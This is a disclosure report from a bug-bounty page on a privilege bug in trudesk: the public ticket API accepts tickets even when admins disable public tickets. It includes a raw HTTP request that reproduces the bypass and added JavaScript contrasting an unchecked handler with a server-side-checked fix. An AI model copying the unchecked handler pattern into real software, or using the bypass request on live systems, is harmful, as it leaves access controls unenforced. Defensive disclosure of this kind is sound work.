Improper Privilege Management in polonel/trudesk


Reported on Jun 15th 2021


External user can submit a ticket even when public tickets are disabled


1. From an admin account, go to Settings --> Tickets and turn off "Allow public tickets".
As a result, an external user can no longer create a ticket through the web form at http://localhost:8118/newissue .

2. Now, as an external user, send the request below (its JSON body, 138 bytes according to Content-Length, is not shown in the report); it creates a public ticket regardless of the setting:

POST /api/v1/public/tickets/create HTTP/1.1
Host: localhost:8118
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 138
Origin: http://localhost:8118
DNT: 1
Connection: close
Referer: http://localhost:8118/newissue
Cookie: $trudesk%3Atimezone=America/New_York; connect.sid=s%3AbDPu1729Dob3ofg_TynNCd_EID7q1h3y.i5p4vnPCeYzyF2mqbEvcE4E%2BVZDHrjhkquUJxSvKbi0


So, even though public ticket creation is disabled in the settings, a user can still create a ticket: the setting is only enforced on the /newissue form, while the /api/v1/public/tickets/create endpoint accepts the request without consulting it. Any client-side or UI-only gate can be bypassed by calling the API directly, so the check has to be made server-side in the endpoint itself.
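The following is an added example, not code from trudesk or from this report: a public-ticket API handler written in the style of the Node.js app, showing the unchecked pattern the report describes next to a hardened version that repeats the "Allow public tickets" check on the server before touching any input. The setting key `allowPublicTickets`, the field names in the request body, and the in-memory stores are assumptions made for this demonstration.

```javascript
// Added example (not trudesk's code): the API endpoint must enforce the same
// "Allow public tickets" setting that hides the /newissue form.

// Constructed in-memory settings store; the admin toggle is assumed to land
// here as a boolean under the key `allowPublicTickets` (assumed name).
const settings = new Map([['allowPublicTickets', false]]);
// Constructed ticket store standing in for the database.
const tickets = [];

function getSetting(name, fallback) {
  return settings.has(name) ? settings.get(name) : fallback;
}

// Minimal validation of the JSON body a public submission would carry.
// Returns null when valid, otherwise an error string.
function validateTicketBody(body) {
  if (!body || typeof body !== 'object') return 'missing body';
  for (const field of ['fullname', 'email', 'subject', 'issue']) {
    if (typeof body[field] !== 'string' || body[field].trim() === '') {
      return `missing or empty field: ${field}`;
    }
  }
  return null;
}

function storeTicket(body) {
  const ticket = {
    id: tickets.length + 1,
    subject: body.subject.trim(),
    issue: body.issue.trim(),
    owner: { fullname: body.fullname.trim(), email: body.email.trim() },
    createdAt: new Date().toISOString(),
  };
  tickets.push(ticket);
  return ticket;
}

// Vulnerable pattern: the endpoint needs no session and never consults the
// setting, so hiding the /newissue form is the only "protection".
function createPublicTicketVulnerable(req) {
  const err = validateTicketBody(req.body);
  if (err) return { status: 400, body: { success: false, error: err } };
  return { status: 200, body: { success: true, ticket: storeTicket(req.body) } };
}

// Hardened pattern: the check the UI relies on is repeated on the server,
// before any input is processed, so a direct API call cannot bypass it.
function createPublicTicketHardened(req) {
  if (getSetting('allowPublicTickets', false) !== true) {
    return { status: 403, body: { success: false, error: 'Public ticket creation is disabled' } };
  }
  const err = validateTicketBody(req.body);
  if (err) return { status: 400, body: { success: false, error: err } };
  return { status: 200, body: { success: true, ticket: storeTicket(req.body) } };
}

// Constructed request standing in for the POST in the report (its body is not
// shown there; these field names are assumed).
const sampleRequest = {
  method: 'POST',
  path: '/api/v1/public/tickets/create',
  headers: { 'content-type': 'application/json' },
  body: { fullname: 'External User', email: 'external@example.com', subject: 'Test', issue: 'Created via API' },
};

// Walk through the report's scenario: setting disabled, external user posts.
function demo() {
  settings.set('allowPublicTickets', false);
  const vulnerable = createPublicTicketVulnerable(sampleRequest).status; // bypass: ticket created
  const hardened = createPublicTicketHardened(sampleRequest).status;     // refused with 403
  settings.set('allowPublicTickets', true);
  const allowed = createPublicTicketHardened(sampleRequest).status;      // accepted once re-enabled
  settings.set('allowPublicTickets', false);
  return { vulnerable, hardened, allowed };
}

console.log(demo());
```

The hardened handler rejects before validating or storing anything, and it reads the setting on every request rather than caching it at startup, so an admin's change takes effect immediately. The same server-side check is what a regression test for this class of bug should exercise: call the API directly with the setting off and expect a refusal, independent of whether the form is rendered.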


Chris validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Chris marked this as fixed with commit 17c2eb 2 years ago
Chris has been awarded the fix bounty
This vulnerability will not receive a CVE